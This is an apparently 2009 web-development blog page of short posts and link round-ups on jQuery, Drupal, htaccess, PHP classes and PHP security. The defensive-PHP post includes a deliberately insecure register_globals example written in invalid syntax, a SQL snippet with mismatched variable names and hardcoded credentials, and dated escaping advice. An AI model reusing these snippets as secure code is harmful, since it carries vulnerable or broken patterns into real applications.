Disabling Right Click (context menu) with jQuery

November 14th, 2009

There are a lot of examples of javascript code snippets to disable right click on web pages. However, jQuery makes it a lot easier:

$(document).ready(function()
{
$(document).bind(”contextmenu”,function(e){
return false;
});
});



Website Statistics Script

November 13th, 2009

Hope it would be helpful to you guys…

Click here:

http://codes.myfreewares.com/php/utilities/php%20script/website%20Usage%20statistics%20script.php-file.htm


How to build a Social Networking Website with Drupal

November 12th, 2009

With this article I want to explain how you can plan and build a Social Networking Website using Drupal. The intent of the post is to provide useful tips and informations to understand the issues behind the building of a working on-line community. This writing was inspired by the reading of two interesting books, Community Building on the Web: Secret Strategies for Succesfull On-line Community and Drupal 6 – Social Networking. It’s clear that in a post I can provide only some useful cues to make a well-done work. I suggest to read the books above mentioned if you want to know more about the techniques and best practices for developing a good web network service.

Tutorial Link:

http://woorkup.com/2009/11/10/how-to-build-a-social-networking-website-with-drupal/


Using htaccess Files for Pretty URLS

November 6th, 2009

Making Url using htaccess that talks about “pretty URLs” and how you can make them happen on your site by combining a bit of htaccess/mod_rewrite magic with PHP.

“While some claim pretty URLs help in search engine rankings, the debate here is fierce, we can all agree that pretty URLs make things easier for our users and adds a level of professionalism and polish to any web application”

To illustrate how it works, they create a simple URL shortening site, showing the difference between the two different methods (htaccess in Apache and PHP’s URL handling) along the way. The application’s pretty simple – store a URL in a MySQL database to be accessed via a special hash coming from the URL.

You can get Guide/Code here:

http://net.tutsplus.com/tutorials/other/using-htaccess-files-for-pretty-urls/

Hope it would be helpful.


Three Important Tips to Write PHP Code Defensively

November 6th, 2009

The phenomenal growth of PHP applications has also led to a mushrooming of increased quantum of malicious activity. It thus becomes imperative that you write secure PHP code to protect your website. Here are some tips for the same.

The three most vulnerable aspects of PHP that can become easily accessible to anyone are XSS (Cross Site Scripting), Global Variables and SQL code.

XSS

The growth of XSS has followed a steady growth in the use of AJAX. Cross Site Scripting, for instance is used when you create a Comment section in your website. If the commentator has to log in to comment, his login information gets stored in a cookie. As the JavaScript code is generally run whenever a person writes the comment, there is a pretty good chance of the contents of the cookie being accessible to a remote server handled by a malicious user.

To counter this, make a habit of including filters whenever you request for random information. Use the die() function to exit from the task whenever the filters detect an unqualified input. The details that are typed are first filtered and then sent to the website’s database. Again the information is filtered before it is output.

<?php
//A good filter program that validates data, prevents XSS attack and
//preempts white lists would look like this
echo 'this is what you input';
echo htmlentities($_POST['myInfo']);
?>

Global Variables

The PHP feature “Register Globals” leads to a palpable lacuna in programming safety. Once this feature is activated in PHP configuration file, even a single variable that is to uninitialized, can lead to a great security flaw. For instance

<?php
if (is_admin()) ( $authorized=true; )
if ($authorized) ( include "/very/sensitive/data.php"; )
?>

When you run the file, because of non-initialization the user may not be verified, resulting in anyone accessing the administrative control! To counter this, you should disable Register Globals, initialize variables use localized variables and as far as possible within the programs.

SQL Code

The SQL code is vulnerable to malicious users just like XSS feature. To write a secure SQL code you need to remember a couple of things. First avoid using dynamic code and second, if dynamic code in inevitable then do not have direct input into the tables.

For instance, a code like this will take care of the sql security

if ($_POST['submit'] == 'Save') {
   if (isset($_POST['acct_num']) &&
       isValidAccountNumber($_POST['acc_num'])) {
        $link = mysql_connect ('hostname', 'user', 'password')
              or die('Could not connect to DB');
        ...
   }
}

Preferably have a database to select user name so that any other entry (like “bingo” or ‘blah blah’) can be swiftly detected. A simple way of preventing SQL security lapse is by typecasting the data so that input is effectively monitored. You can also make use of the versatile “mysql_real_escape_string”. This function can successfully filter symbols and contain SQL security flaws.

These three are the most significant to create a secure PHP code. Apart from this, you should also ensure that

  • The system is well protected
  • Files and database are protected.
  • Posts are verified
  • Input is always validated

Input validation is the key to secure programming. Make a habit of allowing only the right input into your system. A systematic approach to PHP, keeping in mind the pitfalls, can guard the program against most flaws and malicious attacks.


Top 25 Most Dangerous Programming Errors

November 6th, 2009

Glacier

Its a  list generated by CWE/SANS of what they consider to be the twenty-five most dangers errors you can commit in your application development (PHP related or not):

“The document lists the most common and significant programming errors which can lead to serious software vulnerabilities. [...] The 25 vulnerabilities are divided into three main categories: Insecure Interaction Between Components, Risky Resource Management and Porous Defenses, details of which are listed below”

Some of the items in the list include:

  • Insecure Interaction Between Components – Failure to Preserve SQL Query Structure (’SQL Injection’)
  • Risky Resource Management – External Control of Critical State Data
  • Porous Defenses – Execution with Unnecessary Privileges
  • Insecure Interaction Between Components – Cross-Site Request Forgery (CSRF)
  • Porous Defenses – Use of a Broken or Risky Cryptographic Algorithm

You can see the full list here,including explanations for each.

http://cwe.mitre.org/top25/index.html

Extremely useful PHP classes

November 6th, 2009

10 Extremly useful PHP Classes, Hope it would be helpful to you guys…


PHP PSD Reader

PHP which allow you to display any Adobe PSD file on screen. Very usefull to create preview of PSDs designed for clients, for example.
Download :

http://www.phpclasses.org/browse/package/3627.html


Browser detect

One of the most common (and boring) problem for front-end developers is definitely cross-browser compatibility. This PHP class will detect almost all browsers and simplify your cross-browser work.
Download :

http://www.phpclasses.org/browse/package/2827.html


Akismet

Remember those days without spam? If your website gets spammed in any ways, Akismet can probably help you. When a new comment, trackback, or pingback comes to your site it is submitted to the Akismet web service which runs hundreds of tests on the comment and returns a thumbs up or thumbs down.
Download:

http://phpclasses.linuxpourtous.com/browse/package/4401.html


ADOdb

The large majority of websites and web apps are using databases to store all kinds of data. ADOdb is a database abstraction library for PHP, supporting MySQL, PostgreSQL, Interbase, Firebird, Oracle, MS SQL and more. ADOdb is quite easy to learn and have lots of nice features as such as extensive portability support, speed and BSD licencing.
Download :

http://adodb.sourceforge.net/


HTML Purifier

As it name tells, HTML Purifier is a PHP class created to help you writing a better code. HTML Purifier can remove malicious code and make sure your code is standard-compliant. A great tool for all developers.
Download:

http://htmlpurifier.org/


Google charts API

Charts are very useful and highly asked by clients, but they can be a lot of work. I remember some years ago when a friend of mine had to create charts using Photoshop every week for one of his clients. Well, this time is gone for good.
With the Google charts API, a simple chart can be created and displayed on screen using as little as 4 lines of code.
Download:

http://luddep.se/notebook/2008/04/13/charts-php-and-google-charts-api/


pChart

pChart is another chart class, and it is as good as Google charts API. Data can be easily retrieved from SQL queries, CSV files, or manually provided.
Download:

http://pchart.sourceforge.net/index.php


PHP Excel

Excel documents are highly popular in the corporate world. Considering that fact, there’s a strong chance that one of your clients asks for you to create excel files in PHP someday.
Happilly, the PHP Excel engine allow you to easily create and manipulate lots of different files, as such as Excel 2007, Open XML, or PDF.
Download:

http://www.codeplex.com/PHPExcel


Country from IP

Some websites are able to detect your location and automatically display information related with your language. How do they do that? Quite simple, they use your IP adress to find your location. The Country from IP class is easy to use and will allow you to get the country a specific IP is from.
Download:

http://phpclasses.linuxpourtous.com/browse/package/2363.html


Cache Manager

If you’re working on a high traffic site, there’s not doubt you’ll need to cache files in order to improve performance. This will be very easy an simple to do, using this very handy class. A defifinitive must-have, in my opinion.
Download:

http://phpclasses.linuxpourtous.com/browse/package/2860.html


WPGet

As I know many of you have a WordPress blog, I just can’t finish this article without a great tool for our favorite blogging engine.
WPGet is a PHP class which allow you to easily get infos from a WordPress 2.X database. In other words, it allows you to get posts, comments, etc from a WordPress blog, on a non-WordPress site. Great, isn’t it?
Download:

http://phpclasses.linuxpourtous.com/browse/package/3328.html



Getting Clean With PHP

November 6th, 2009

Getting Clean With PHP

New from NETTUTS.com today there’s an article that both reminds PHP developers of the importance of filtering data and gives them a long list of the filters that PHP has to make it easy.

Data security is important and often undervalued by designers, developers, and clients alike. Since PHP 5.2.0, data sanitization and validation has been made significantly easier with the introduction of data filtering. Today, we’re going to take a closer look at these filters, how to use them, and build a few custom functions.

They talk about filtering things like cross-site scripting, SQL injections and “improper” data in your submissions. They look at the filter extension and how the filter_var function can be used in combination with a long list of filter types to ensure the validity of your data (like FILTER_VALIDATE_EMAIL, FILTER_VALIDATE_IP, FILTER_SANITIZE_STRING and FILTER_SANITIZE_URL). They also briefly mention the use of custom functions to handle validation on more complex data sets.

Click here to view the article:


http://net.tutsplus.com/tutorials/php/getting-clean-with-php/


CSS Differences in Internet Explorer 6, 7 and 8

November 6th, 2009

CSS Differences in Internet Explorer 6, 7 and 8” ,
Hope it would be helpful to you guys…mostly Designers….

Click here:

http://www.smashingmagazine.com/2009/10/14/css-differences-in-internet-explorer-6-7-and-8/


Pagination-gallery-examples-and-good-practices

November 6th, 2009

Pagination-gallery-examples-and-good-practices” ,
Hope it would be helpful to you guys…

Click here:

http://www.smashingmagazine.com/2007/11/16/pagination-gallery-examples-and-good-practices/